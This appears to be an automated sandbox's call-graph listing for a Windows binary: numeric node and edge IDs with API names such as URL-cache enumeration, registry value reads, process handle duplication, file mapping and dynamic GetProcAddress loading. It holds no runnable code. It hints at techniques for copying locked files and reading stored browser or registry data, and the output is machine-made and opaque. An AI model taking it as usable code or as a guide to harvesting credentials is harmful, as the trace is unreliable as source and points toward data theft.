40c373 GetLastError 38936->38937 38939 40c3ad FindCloseUrlCache 38937->38939 38940 40c37e 38937->38940 38941 40c33e wcschr 38938->38941 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39094 40a97a 38946->39094 38949 40a8cc 38949->38540 38950 40a8d0 7 API calls 38950->38949 39099 40b1ab free free 38951->39099 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39100 40aa1d 38959->39100 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39102 405220 38971->39102 38974->38552 38975->38554 38976->38547 38977->38548 38979 40ae18 9 API calls 38978->38979 38985 40c210 38979->38985 38980 40ae51 9 API calls 38980->38985 38981 40c264 38982 40aebe FindClose 38981->38982 38984 40c26f 38982->38984 38983 40add4 2 API calls 38983->38985 38990 40e5ed memset memset 38984->38990 38985->38980 38985->38981 38985->38983 38986 40c231 _wcsicmp 38985->38986 38987 40c1d3 34 API calls 38985->38987 38986->38985 38988 40c248 38986->38988 38987->38985 39003 40c084 21 API calls 38988->39003 38991 414c2e 14 API calls 38990->38991 38992 40e63f 38991->38992 38993 409d1f 6 API calls 38992->38993 38994 40e658 38993->38994 39004 409b98 GetFileAttributesW 38994->39004 38996 40e667 38997 409d1f 6 API calls 38996->38997 38999 40e680 38996->38999 38997->38999 39005 409b98 GetFileAttributesW 38999->39005 39000 40e68f 39001 40c2d8 39000->39001 39006 40e4b2 39000->39006 39001->38929 39001->38930 39003->38985 39004->38996 39005->39000 39027 40e01e 39006->39027 39008 40e593 39009 40e5b0 39008->39009 39010 40e59c DeleteFileW 39008->39010 39011 40b04b ??3@YAXPAX 39009->39011 39010->39009 39013 40e5bb 39011->39013 39012 40e521 39012->39008 39050 40e175 39012->39050 39015 40e5c4 CloseHandle 39013->39015 39016 40e5cc 39013->39016 39015->39016 39018 40b633 free 39016->39018 39017 40e573 39020 40e584 39017->39020 39021 40e57c CloseHandle 39017->39021 39019 40e5db 39018->39019 39023 40b633 free 39019->39023 39093 40b1ab free free 39020->39093 39021->39020 39022 40e540 39022->39017 39070 40e2ab 39022->39070 39025 40e5e3 39023->39025 39025->39001 39028 406214 22 API calls 39027->39028 39029 40e03c 39028->39029 39030 40e16b 39029->39030 39031 40dd85 74 API calls 39029->39031 39030->39012 39032 40e06b 39031->39032 39032->39030 39033 40afcf ??2@YAPAXI ??3@YAXPAX 39032->39033 39034 40e08d OpenProcess 39033->39034 39035 40e0a4 GetCurrentProcess DuplicateHandle 39034->39035 39039 40e152 39034->39039 39036 40e0d0 GetFileSize 39035->39036 39037 40e14a CloseHandle 39035->39037 39040 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39036->39040 39037->39039 39038 40e160 39042 40b04b ??3@YAXPAX 39038->39042 39039->39038 39041 406214 22 API calls 39039->39041 39043 40e0ea 39040->39043 39041->39038 39042->39030 39044 4096dc CreateFileW 39043->39044 39045 40e0f1 CreateFileMappingW 39044->39045 39046 40e140 CloseHandle CloseHandle 39045->39046 39047 40e10b MapViewOfFile 39045->39047 39046->39037 39048 40e13b CloseHandle 39047->39048 39049 40e11f WriteFile UnmapViewOfFile 39047->39049 39048->39046 39049->39048 39051 40e18c 39050->39051 39052 406b90 11 API calls 39051->39052 39053 40e19f 39052->39053 39054 40e1a7 memset 39053->39054 39055 40e299 39053->39055 39060 40e1e8 39054->39060 39056 4069a3 ??3@YAXPAX free 39055->39056 39057 40e2a4 39056->39057 39057->39022 39058 406e8f 13 API calls 39058->39060 39059 406b53 SetFilePointerEx ReadFile 39059->39060 39060->39058 39060->39059 39061 40dd50 _wcsicmp 39060->39061 39062 40e283 39060->39062 39066 40742e 8 API calls 39060->39066 39067 40aae3 wcslen wcslen _memicmp 39060->39067 39068 40e244 _snwprintf 39060->39068 39061->39060 39063 40e291 39062->39063 39064 40e288 free 39062->39064 39065 40aa04 free 39063->39065 39064->39063 39065->39055 39066->39060 39067->39060 39069 40a8d0 7 API calls 39068->39069 39069->39060 39071 40e2c2 39070->39071 39072 406b90 11 API calls 39071->39072 39083 40e2d3 39072->39083 39073 40e4a0 39074 4069a3 ??3@YAXPAX free 39073->39074 39076 40e4ab 39074->39076 39075 406e8f 13 API calls 39075->39083 39076->39022 39077 406b53 SetFilePointerEx ReadFile 39077->39083 39078 40e489 39079 40aa04 free 39078->39079 39080 40e491 39079->39080 39080->39073 39082 40e497 free 39080->39082 39081 40dd50 _wcsicmp 39081->39083 39082->39073 39083->39073 39083->39075 39083->39077 39083->39078 39083->39081 39084 40dd50 _wcsicmp 39083->39084 39087 40742e 8 API calls 39083->39087 39088 40e3e0 memcpy 39083->39088 39089 40e3fb memcpy 39083->39089 39090 40e3b3 wcschr 39083->39090 39091 40e416 memcpy 39083->39091 39092 40e431 memcpy 39083->39092 39085 40e376 memset 39084->39085 39086 40aa29 6 API calls 39085->39086 39086->39083 39087->39083 39088->39083 39089->39083 39090->39083 39091->39083 39092->39083 39093->39008 39095 40a980 39094->39095 39096 40a995 _wcsicmp 39095->39096 39097 40a99c wcscmp 39095->39097 39098 40a8bb 39095->39098 39096->39095 39097->39095 39098->38949 39098->38950 39099->38953 39101 40aa23 RegEnumValueW 39100->39101 39101->38962 39101->38963 39103 405335 39102->39103 39104 40522a 39102->39104 39103->38547 39105 40b2cc 27 API calls 39104->39105 39106 405234 39105->39106 39107 40a804 8 API calls 39106->39107 39108 40523a 39107->39108 39147 40b273 39108->39147 39110 405248 _mbscpy _mbscat GetProcAddress 39111 40b273 27 API calls 39110->39111 39112 405279 39111->39112 39150 405211 GetProcAddress 39112->39150 39114 405282 39115 40b273 27 API calls 39114->39115 39116 40528f 39115->39116 39151 405211 GetProcAddress 39116->39151 39118 405298 39119 40b273 27 API calls 39118->39119 39120 4052a5 39119->39120 39152 405211 GetProcAddress 39120->39152 39122 4052ae 39123 40b273 27 API calls 39122->39123 39124 4052bb 39123->39124 39153 405211 GetProcAddress 39124->39153 39126 4052c4 39127 40b273 27 API calls 39126->39127 39128 4052d1 39127->39128 39154 405211 GetProcAddress 39128->39154 39130 4052da 39131 40b273 27 API calls 39130->39131 39132 4052e7 39131->39132 39155 405211 GetProcAddress 39132->39155 39134 4052f0 39135 40b273 27 API calls 39134->39135 39136 4052fd 39135->39136 39156 405211 GetProcAddress 39136->39156 39138 405306 39139 40b273 27 API calls 39138->39139 39140 405313 39139->39140 39157 405211 GetProcAddress 39140->39157 39142 40531c 39143 40b273 27 API calls 39142->39143 39144 405329 39143->39144 39158 405211 GetProcAddress 39144->39158 39146 405332 39146->39103 39148 40b58d 27 API calls 39147->39148 39149 40b18c 39148->39149 39149->39110 39150->39114 39151->39118 39152->39122 39153->39126 39154->39130 39155->39134 39156->39138 39157->39142 39158->39146 39160 40440c FreeLibrary 39159->39160 39161 40436d 39160->39161 39162 40a804 8 API calls 39161->39162 39163 404377 39162->39163 39164 404383 39163->39164 39165 404405 39163->39165 39166 40b273 27 API calls 39164->39166 39165->38559 39165->38561 39165->38562 39167 40438d GetProcAddress 39166->39167 39168 40b273 27 API calls 39167->39168 39169 4043a7 GetProcAddress 39168->39169 39170 40b273 27 API calls 39169->39170 39171 4043ba GetProcAddress 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043ce GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043e2 GetProcAddress 39174->39175 39176 4043f1 39175->39176 39177 4043f7 39176->39177 39178 40440c FreeLibrary 39176->39178 39177->39165 39178->39165 39180 404413 FreeLibrary 39179->39180 39181 40441e 39179->39181 39180->39181 39181->38576 39182->38572 39184 40447e 39183->39184 39185 40442e 39183->39185 39184->38572 39186 40b2cc 27 API calls 39185->39186 39187 404438 39186->39187 39188 40a804 8 API calls 39187->39188 39189 40443e 39188->39189 39190 404445 39189->39190 39191 404467 39189->39191 39192 40b273 27 API calls 39190->39192 39191->39184 39194 404475 FreeLibrary 39191->39194 39193 40444f GetProcAddress 39192->39193 39193->39191 39195 404460 39193->39195 39194->39184 39195->39191 39197 4135f6 39196->39197 39198 4135eb FreeLibrary 39196->39198 39197->38579 39198->39197 39200 4449c4 39199->39200 39201 444a52 39199->39201 39202 40b2cc 27 API calls 39200->39202 39201->38596 39201->38597 39203 4449cb 39202->39203 39204 40a804 8 API calls 39203->39204 39205 4449d1 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4449dc GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4449f3 GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 444a04 GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 444a15 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a26 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a37 GetProcAddress 39216->39217 39218 40b273 27 API calls 39217->39218 39219 444a48 GetProcAddress 39218->39219 39219->39201 39220->38607 39221->38607 39222->38607 39223->38607 39224->38598 39226 403a29 39225->39226 39240 403bed memset memset 39226->39240 39228 403ae7 39253 40b1ab free free 39228->39253 39229 403a3f memset 39233 403a2f 39229->39233 39231 403aef 39231->38614 39232 409d1f 6 API calls 39232->39233 39233->39228 39233->39229 39233->39232 39234 409b98 GetFileAttributesW 39233->39234 39235 40a8d0 7 API calls 39233->39235 39234->39233 39235->39233 39237 40a051 GetFileTime CloseHandle 39236->39237 39238 4039ca CompareFileTime 39236->39238 39237->39238 39238->38614 39239->38615 39241 414c2e 14 API calls 39240->39241 39242 403c38 39241->39242 39243 409719 2 API calls 39242->39243 39244 403c3f wcscat 39243->39244 39245 414c2e 14 API calls 39244->39245 39246 403c61 39245->39246 39247 409719 2 API calls 39246->39247 39248 403c68 wcscat 39247->39248 39254 403af5 39248->39254 39251 403af5 20 API calls 39252 403c95 39251->39252 39252->39233 39253->39231 39255 403b02 39254->39255 39256 40ae18 9 API calls 39255->39256 39265 403b37 39256->39265 39257 403bdb 39259 40aebe FindClose 39257->39259 39258 40add4 wcscmp wcscmp 39258->39265 39260 403be6 39259->39260 39260->39251 39261 40a8d0 7 API calls 39261->39265 39262 40ae18 9 API calls 39262->39265 39263 40ae51 9 API calls 39263->39265 39264 40aebe FindClose 39264->39265 39265->39257 39265->39258 39265->39261 39265->39262 39265->39263 39265->39264 39267 409d1f 6 API calls 39266->39267 39268 404190 39267->39268 39281 409b98 GetFileAttributesW 39268->39281 39270 40419c 39271 4041a7 6 API calls 39270->39271 39272 40435c 39270->39272 39273 40424f 39271->39273 39272->38636 39273->39272 39275 40425e memset 39273->39275 39277 409d1f 6 API calls 39273->39277 39278 40a8ab 9 API calls 39273->39278 39282 414842 39273->39282 39275->39273 39276 404296 wcscpy 39275->39276 39276->39273 39277->39273 39279 4042b6 memset memset _snwprintf wcscpy 39278->39279 39279->39273 39280->38640 39281->39270 39285 41443e 39282->39285 39284 414866 39284->39273 39286 41444b 39285->39286 39287 414451 39286->39287 39288 4144a3 GetPrivateProfileStringW 39286->39288 39289 414491 39287->39289 39290 414455 wcschr 39287->39290 39288->39284 39292 414495 WritePrivateProfileStringW 39289->39292 39290->39289 39291 414463 _snwprintf 39290->39291 39291->39292 39292->39284 39293->38645 39295 40b2cc 27 API calls 39294->39295 39296 409615 39295->39296 39297 409d1f 6 API calls 39296->39297 39298 409625 39297->39298 39323 409b98 GetFileAttributesW 39298->39323 39300 409634 39301 409648 39300->39301 39324 4091b8 memset 39300->39324 39303 40b2cc 27 API calls 39301->39303 39305 408801 39301->39305 39304 40965d 39303->39304 39306 409d1f 6 API calls 39304->39306 39305->38648 39305->38692 39307 40966d 39306->39307 39376 409b98 GetFileAttributesW 39307->39376 39309 40967c 39309->39305 39310 409681 39309->39310 39377 409529 72 API calls 39310->39377 39312 409690 39312->39305 39313->38670 39314->38692 39315->38675 39316->38692 39317->38680 39323->39300 39378 40a6e6 WideCharToMultiByte 39324->39378 39326 409202 39379 444432 39326->39379 39329 40b273 27 API calls 39330 409236 39329->39330 39425 438552 39330->39425 39333 409383 39335 40b273 27 API calls 39333->39335 39337 409399 39335->39337 39336 409254 39338 40937b 39336->39338 39446 4253cf 17 API calls 39336->39446 39339 438552 133 API calls 39337->39339 39450 424f26 122 API calls 39338->39450 39358 4093a3 39339->39358 39342 409267 39447 4253cf 17 API calls 39342->39447 39343 4094ff 39454 443d90 39343->39454 39346 4251c4 136 API calls 39346->39358 39348 409507 39356 40951d 39348->39356 39474 408f2f 77 API calls 39348->39474 39350 4093df 39453 424f26 122 API calls 39350->39453 39352 4253cf 17 API calls 39352->39358 39356->39301 39358->39343 39358->39346 39358->39350 39358->39352 39360 4093e4 39358->39360 39451 4253af 17 API calls 39360->39451 39366 4093ed 39452 4253af 17 API calls 39366->39452 39369 4093f9 39369->39350 39370 409409 memcmp 39369->39370 39370->39350 39371 409421 memcmp 39370->39371 39372 4094a4 memcmp 39371->39372 39373 409435 39371->39373 39372->39350 39373->39350 39376->39309 39377->39312 39378->39326 39475 4438b5 39379->39475 39381 44444c 39387 409215 39381->39387 39489 415a6d 39381->39489 39384 444486 39386 4444b9 memcpy 39384->39386 39424 4444a4 39384->39424 39385 44469e 39385->39387 39389 443d90 110 API calls 39385->39389 39493 415258 39386->39493 39387->39329 39387->39356 39389->39387 39390 444524 39391 444541 39390->39391 39392 44452a 39390->39392 39496 444316 39391->39496 39530 416935 39392->39530 39396 444316 18 API calls 39397 444563 39396->39397 39398 444316 18 API calls 39397->39398 39399 44456f 39398->39399 39400 444316 18 API calls 39399->39400 39401 44457f 39400->39401 39401->39424 39510 432d4e 39401->39510 39543 4442e6 11 API calls 39424->39543 39544 438460 39425->39544 39427 409240 39427->39333 39428 4251c4 39427->39428 39556 424f07 39428->39556 39430 4251e4 39431 4251f7 39430->39431 39432 4251e8 39430->39432 39564 4250f8 39431->39564 39563 4446ea 11 API calls 39432->39563 39434 4251f2 39434->39336 39436 425209 39439 425249 39436->39439 39442 4250f8 126 API calls 39436->39442 39443 425287 39436->39443 39572 4384e9 134 API calls 39436->39572 39573 424f74 123 API calls 39436->39573 39439->39443 39574 424ff0 13 API calls 39439->39574 39442->39436 39576 415c7d 16 API calls 39443->39576 39446->39342 39450->39333 39451->39366 39452->39369 39453->39343 39455 443da3 39454->39455 39473 443db6 39454->39473 39577 41707a 11 API calls 39455->39577 39457 443da8 39458 443dac 39457->39458 39460 443dbc 39457->39460 39578 4446ea 11 API calls 39458->39578 39579 4300e8 memset memset memcpy 39460->39579 39473->39348 39474->39356 39476 4438d0 39475->39476 39482 4438c9 39475->39482 39477 415378 memcpy memcpy 39476->39477 39478 4438d5 39477->39478 39479 4154e2 10 API calls 39478->39479 39480 443906 39478->39480 39478->39482 39479->39480 39481 443970 memset 39480->39481 39480->39482 39484 44398b 39481->39484 39482->39381 39483 415700 10 API calls 39486 4439c0 39483->39486 39485 41975c 10 API calls 39484->39485 39487 4439a0 39484->39487 39485->39487 39486->39482 39488 418981 10 API calls 39486->39488 39487->39482 39487->39483 39488->39482 39490 415a77 39489->39490 39491 415a8d 39490->39491 39492 415a7e memset 39490->39492 39491->39384 39492->39491 39494 4438b5 11 API calls 39493->39494 39495 41525d 39494->39495 39495->39390 39497 444328 39496->39497 39498 444423 39497->39498 39499 44434e 39497->39499 39500 4446ea 11 API calls 39498->39500 39501 432d4e memset memset memcpy 39499->39501 39507 444381 39500->39507 39502 44435a 39501->39502 39504 444375 39502->39504 39509 44438b 39502->39509 39503 432d4e memset memset memcpy 39505 4443ec 39503->39505 39506 416935 16 API calls 39504->39506 39505->39507 39508 416935 16 API calls 39505->39508 39506->39507 39507->39396 39508->39507 39509->39503 39511 432d58 39510->39511 39513 432d65 39510->39513 39512 432cc4 memset memset memcpy 39511->39512 39512->39513 39531 41693e 39530->39531 39534 41698e 39530->39534 39532 41694c 39531->39532 39533 422fd1 memset 39531->39533 39532->39534 39535 4165a0 11 API calls 39532->39535 39533->39532 39534->39424 39536 416972 39535->39536 39536->39534 39537 422b84 15 API calls 39536->39537 39537->39534 39543->39385 39545 41703f 11 API calls 39544->39545 39546 43847a 39545->39546 39547 43848a 39546->39547 39548 43847e 39546->39548 39550 438270 133 API calls 39547->39550 39549 4446ea 11 API calls 39548->39549 39552 438488 39549->39552 39551 4384aa 39550->39551 39551->39552 39553 424f26 122 API calls 39551->39553 39552->39427 39554 4384bb 39553->39554 39555 438270 133 API calls 39554->39555 39555->39552 39557 424f1f 39556->39557 39558 424f0c 39556->39558 39560 424eea 11 API calls 39557->39560 39559 416760 11 API calls 39558->39559 39561 424f18 39559->39561 39562 424f24 39560->39562 39561->39430 39562->39430 39563->39434 39565 425108 39564->39565 39571 42510d 39564->39571 39566 424f74 123 API calls 39565->39566 39566->39571 39567 42569b 124 API calls 39568 42516e 39567->39568 39570 415c7d 16 API calls 39568->39570 39569 425115 39569->39436 39570->39569 39571->39567 39571->39569 39572->39436 39573->39436 39576->39434 39577->39457 39578->39473 39610 413f4f 39583->39610 39586 413f37 K32GetModuleFileNameExW 39587 413f4a 39586->39587 39587->38708 39589 41396c wcschr 39588->39589 39591 413969 wcscpy 39588->39591 39589->39591 39592 41398e 39589->39592 39593 413a3a 39591->39593 39615 4097f7 wcslen wcslen _memicmp 39592->39615 39593->38708 39595 41399a 39596 4139a4 memset 39595->39596 39597 4139e6 39595->39597 39616 409dd5 GetWindowsDirectoryW wcscpy 39596->39616 39599 413a31 wcscpy 39597->39599 39600 4139ec memset 39597->39600 39599->39593 39617 409dd5 GetWindowsDirectoryW wcscpy 39600->39617 39601 4139c9 wcscpy wcscat 39601->39593 39603 413a11 memcpy wcscat 39603->39593 39605 413cb0 GetModuleHandleW 39604->39605 39606 413cda 39604->39606 39605->39606 39607 413cbf GetProcAddress 39605->39607 39608 413ce3 GetProcessTimes 39606->39608 39609 413cf6 39606->39609 39607->39606 39608->38710 39609->38710 39611 413f2f 39610->39611 39612 413f54 39610->39612 39611->39586 39611->39587 39613 40a804 8 API calls 39612->39613 39614 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39613->39614 39614->39611 39615->39595 39616->39601 39617->39603 39618->38731 39619->38753 39621 409cf9 GetVersionExW 39620->39621 39622 409d0a 39620->39622 39621->39622 39622->38760 39622->38763 39623->38767 39624->38769 39625->38835 39627 40bba5 39626->39627 39674 40cc26 39627->39674 39630 40bd4b 39695 40cc0c 39630->39695 39635 40b2cc 27 API calls 39636 40bbef 39635->39636 39702 40ccf0 _wcsicmp 39636->39702 39638 40bbf5 39638->39630 39703 40ccb4 6 API calls 39638->39703 39640 40bc26 39641 40cf04 17 API calls 39640->39641 39642 40bc2e 39641->39642 39643 40bd43 39642->39643 39644 40b2cc 27 API calls 39642->39644 39645 40cc0c 4 API calls 39643->39645 39646 40bc40 39644->39646 39645->39630 39704 40ccf0 _wcsicmp 39646->39704 39648 40bc46 39648->39643 39649 40bc61 memset memset WideCharToMultiByte 39648->39649 39705 40103c strlen 39649->39705 39651 40bcc0 39652 40b273 27 API calls 39651->39652 39653 40bcd0 memcmp 39652->39653 39653->39643 39654 40bce2 39653->39654 39655 404423 37 API calls 39654->39655 39656 40bd10 39655->39656 39656->39643 39657 40bd3a LocalFree 39656->39657 39658 40bd1f memcpy 39656->39658 39657->39643 39658->39657 39659->38850 39661 409a74 GetTempFileNameW 39660->39661 39662 409a66 GetWindowsDirectoryW 39660->39662 39661->38848 39662->39661 39663->38885 39664->38885 39665->38885 39666->38885 39667->38885 39668->38885 39669->38885 39670->38885 39671->38885 39672->38860 39673->38882 39706 4096c3 CreateFileW 39674->39706 39676 40cc34 39677 40cc3d GetFileSize 39676->39677 39678 40bbca 39676->39678 39679 40afcf 2 API calls 39677->39679 39678->39630 39686 40cf04 39678->39686 39680 40cc64 39679->39680 39707 40a2ef ReadFile 39680->39707 39682 40cc71 39708 40ab4a MultiByteToWideChar 39682->39708 39684 40cc95 CloseHandle 39685 40b04b ??3@YAXPAX 39684->39685 39685->39678 39687 40b633 free 39686->39687 39688 40cf14 39687->39688 39714 40b1ab free free 39688->39714 39690 40bbdd 39690->39630 39690->39635 39691 40cf1b 39691->39690 39693 40cfef 39691->39693 39715 40cd4b 39691->39715 39694 40cd4b 14 API calls 39693->39694 39694->39690 39696 40b633 free 39695->39696 39697 40cc15 39696->39697 39698 40aa04 free 39697->39698 39699 40cc1d 39698->39699 39764 40b1ab free free 39699->39764 39701 40b7d4 memset CreateFileW 39701->38841 39701->38842 39702->39638 39703->39640 39704->39648 39705->39651 39706->39676 39707->39682 39709 40ab6b 39708->39709 39713 40ab93 39708->39713 39710 40a9ce 4 API calls 39709->39710 39711 40ab74 39710->39711 39712 40ab7c MultiByteToWideChar 39711->39712 39712->39713 39713->39684 39714->39691 39716 40cd7b 39715->39716 39749 40aa29 39716->39749 39718 40cef5 39719 40aa04 free 39718->39719 39720 40cefd 39719->39720 39720->39691 39722 40aa29 6 API calls 39723 40ce1d 39722->39723 39724 40aa29 6 API calls 39723->39724 39725 40ce3e 39724->39725 39726 40ce6a 39725->39726 39757 40abb7 wcslen memmove 39725->39757 39727 40ce9f 39726->39727 39760 40abb7 wcslen memmove 39726->39760 39730 40a8d0 7 API calls 39727->39730 39733 40ceb5 39730->39733 39731 40ce56 39758 40aa71 wcslen 39731->39758 39732 40ce8b 39761 40aa71 wcslen 39732->39761 39739 40a8d0 7 API calls 39733->39739 39736 40ce5e 39759 40abb7 wcslen memmove 39736->39759 39737 40ce93 39762 40abb7 wcslen memmove 39737->39762 39741 40cecb 39739->39741 39763 40d00b malloc memcpy free free 39741->39763 39743 40cedd 39744 40aa04 free 39743->39744 39745 40cee5 39744->39745 39746 40aa04 free 39745->39746 39747 40ceed 39746->39747 39748 40aa04 free 39747->39748 39748->39718 39750 40aa33 39749->39750 39756 40aa63 39749->39756 39751 40aa44 39750->39751 39752 40aa38 wcslen 39750->39752 39753 40a9ce malloc memcpy free free 39751->39753 39752->39751 39754 40aa4d 39753->39754 39755 40aa51 memcpy 39754->39755 39754->39756 39755->39756 39756->39718 39756->39722 39757->39731 39758->39736 39759->39726 39760->39732 39761->39737 39762->39727 39763->39743 39764->39701 39765->38900 39766->38908 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39776 4148b6 FindResourceW 39777 4148cf SizeofResource 39776->39777 39780 4148f9 39776->39780 39778 4148e0 LoadResource 39777->39778 39777->39780 39779 4148ee LockResource 39778->39779 39778->39780 39779->39780 37851 415304 free 39781 441b3f 39791 43a9f6 39781->39791 39783 441b61 39964 4386af memset 39783->39964 39785 44189a 39786 4418e2 39785->39786 39788 442bd4 39785->39788 39787 4418ea 39786->39787 39965 4414a9 12 API calls 39786->39965 39788->39787 39966 441409 memset 39788->39966 39792 43aa20 39791->39792 39793 43aadf 39791->39793 39792->39793 39794 43aa34 memset 39792->39794 39793->39783 39795 43aa56 39794->39795 39796 43aa4d 39794->39796 39967 43a6e7 39795->39967 39975 42c02e memset 39796->39975 39801 43aad3 39977 4169a7 11 API calls 39801->39977 39802 43aaae 39802->39793 39802->39801 39817 43aae5 39802->39817 39803 43ac18 39806 43ac47 39803->39806 39979 42bbd5 memcpy memcpy memcpy memset memcpy 39803->39979 39807 43aca8 39806->39807 39980 438eed 16 API calls 39806->39980 39810 43acd5 39807->39810 39982 4233ae 11 API calls 39807->39982 39983 423426 11 API calls 39810->39983 39811 43ac87 39981 4233c5 16 API calls 39811->39981 39815 43ace1 39984 439811 162 API calls 39815->39984 39816 43a9f6 160 API calls 39816->39817 39817->39793 39817->39803 39817->39816 39978 439bbb 22 API calls 39817->39978 39819 43acfd 39824 43ad2c 39819->39824 39985 438eed 16 API calls 39819->39985 39821 43ad19 39986 4233c5 16 API calls 39821->39986 39822 43ad58 39987 44081d 162 API calls 39822->39987 39824->39822 39828 43add9 39824->39828 39827 43ae3a memset 39829 43ae73 39827->39829 39828->39828 39991 423426 11 API calls 39828->39991 39992 42e1c0 146 API calls 39829->39992 39830 43adab 39989 438c4e 162 API calls 39830->39989 39833 43ad6c 39833->39793 39833->39830 39988 42370b memset memcpy memset 39833->39988 39835 43adcc 39990 440f84 12 API calls 39835->39990 39836 43ae96 39993 42e1c0 146 API calls 39836->39993 39839 43aea8 39840 43aec1 39839->39840 39994 42e199 146 API calls 39839->39994 39841 43af00 39840->39841 39995 42e1c0 146 API calls 39840->39995 39841->39793 39845 43af1a 39841->39845 39846 43b3d9 39841->39846 39996 438eed 16 API calls 39845->39996 39852 43b3f6 39846->39852 39854 43b4c8 39846->39854 39848 43b60f 39848->39793 40055 4393a5 17 API calls 39848->40055 39850 43af2f 39997 4233c5 16 API calls 39850->39997 40037 432878 12 API calls 39852->40037 39853 43af51 39998 423426 11 API calls 39853->39998 39856 43b4f2 39854->39856 40043 42bbd5 memcpy memcpy memcpy memset memcpy 39854->40043 40044 43a76c 21 API calls 39856->40044 39858 43af7d 39999 423426 11 API calls 39858->39999 39862 43b529 40045 44081d 162 API calls 39862->40045 39863 43b462 40039 423330 11 API calls 39863->40039 39864 43af94 40000 423330 11 API calls 39864->40000 39868 43afca 40001 423330 11 API calls 39868->40001 39869 43b47e 39873 43b497 39869->39873 40040 42374a memcpy memset memcpy memcpy memcpy 39869->40040 39870 43b544 39874 43b55c 39870->39874 40046 42c02e memset 39870->40046 39871 43b428 39871->39863 40038 432b60 16 API calls 39871->40038 40041 4233ae 11 API calls 39873->40041 40047 43a87a 162 API calls 39874->40047 39875 43afdb 40002 4233ae 11 API calls 39875->40002 39881 43b56c 39884 43b58a 39881->39884 40048 423330 11 API calls 39881->40048 39882 43b4b1 40042 423399 11 API calls 39882->40042 39883 43afee 40003 44081d 162 API calls 39883->40003 40049 440f84 12 API calls 39884->40049 39886 43b4c1 40051 42db80 162 API calls 39886->40051 39891 43b592 40050 43a82f 16 API calls 39891->40050 39894 43b5b4 40052 438c4e 162 API calls 39894->40052 39896 43b5cf 40053 42c02e memset 39896->40053 39898 43b005 39898->39793 39902 43b01f 39898->39902 40004 42d836 162 API calls 39898->40004 39899 43b1ef 40014 4233c5 16 API calls 39899->40014 39902->39899 40012 423330 11 API calls 39902->40012 40013 42d71d 162 API calls 39902->40013 39903 43b212 40015 423330 11 API calls 39903->40015 39904 43b087 40005 4233ae 11 API calls 39904->40005 39905 43add4 39905->39848 40054 438f86 16 API calls 39905->40054 39909 43b22a 40016 42ccb5 11 API calls 39909->40016 39912 43b23f 40017 4233ae 11 API calls 39912->40017 39913 43b10f 40008 423330 11 API calls 39913->40008 39915 43b257 40018 4233ae 11 API calls 39915->40018 39919 43b129 40009 4233ae 11 API calls 39919->40009 39920 43b26e 40019 4233ae 11 API calls 39920->40019 39923 43b09a 39923->39913 40006 42cc15 19 API calls 39923->40006 40007 4233ae 11 API calls 39923->40007 39924 43b282 40020 43a87a 162 API calls 39924->40020 39926 43b13c 40010 440f84 12 API calls 39926->40010 39928 43b29d 40021 423330 11 API calls 39928->40021 39931 43b15f 40011 4233ae 11 API calls 39931->40011 39932 43b2af 39934 43b2b8 39932->39934 39935 43b2ce 39932->39935 40022 4233ae 11 API calls 39934->40022 40023 440f84 12 API calls 39935->40023 39938 43b2c9 40025 4233ae 11 API calls 39938->40025 39939 43b2da 40024 42370b memset memcpy memset 39939->40024 39942 43b2f9 40026 423330 11 API calls 39942->40026 39944 43b30b 40027 423330 11 API calls 39944->40027 39946 43b325 40028 423399 11 API calls 39946->40028 39948 43b332 40029 4233ae 11 API calls 39948->40029 39950 43b354 40030 423399 11 API calls 39950->40030 39952 43b364 40031 43a82f 16 API calls 39952->40031 39954 43b370 40032 42db80 162 API calls 39954->40032 39956 43b380 40033 438c4e 162 API calls 39956->40033 39958 43b39e 40034 423399 11 API calls 39958->40034 39960 43b3ae 40035 43a76c 21 API calls 39960->40035 39962 43b3c3 40036 423399 11 API calls 39962->40036 39964->39785 39965->39787 39966->39788 39968 43a6f5 39967->39968 39969 43a765 39967->39969 39968->39969 40056 42a115 39968->40056 39969->39793 39976 4397fd memset 39969->39976 39973 43a73d 39973->39969 39974 42a115 146 API calls 39973->39974 39974->39969 39975->39795 39976->39802 39977->39793 39978->39817 39979->39806 39980->39811 39981->39807 39982->39810 39983->39815 39984->39819 39985->39821 39986->39824 39987->39833 39988->39830 39989->39835 39990->39905 39991->39827 39992->39836 39993->39839 39994->39840 39995->39840 39996->39850 39997->39853 39998->39858 39999->39864 40000->39868 40001->39875 40002->39883 40003->39898 40004->39904 40005->39923 40006->39923 40007->39923 40008->39919 40009->39926 40010->39931 40011->39902 40012->39902 40013->39902 40014->39903 40015->39909 40016->39912 40017->39915 40018->39920 40019->39924 40020->39928 40021->39932 40022->39938 40023->39939 40024->39938 40025->39942 40026->39944 40027->39946 40028->39948 40029->39950 40030->39952 40031->39954 40032->39956 40033->39958 40034->39960 40035->39962 40036->39905 40037->39871 40038->39863 40039->39869 40040->39873 40041->39882 40042->39886 40043->39856 40044->39862 40045->39870 40046->39874 40047->39881 40048->39884 40049->39891 40050->39886 40051->39894 40052->39896 40053->39905 40054->39848 40055->39793 40057 42a175 40056->40057 40059 42a122 40056->40059 40057->39969 40062 42b13b 146 API calls 40057->40062 40059->40057 40060 42a115 146 API calls 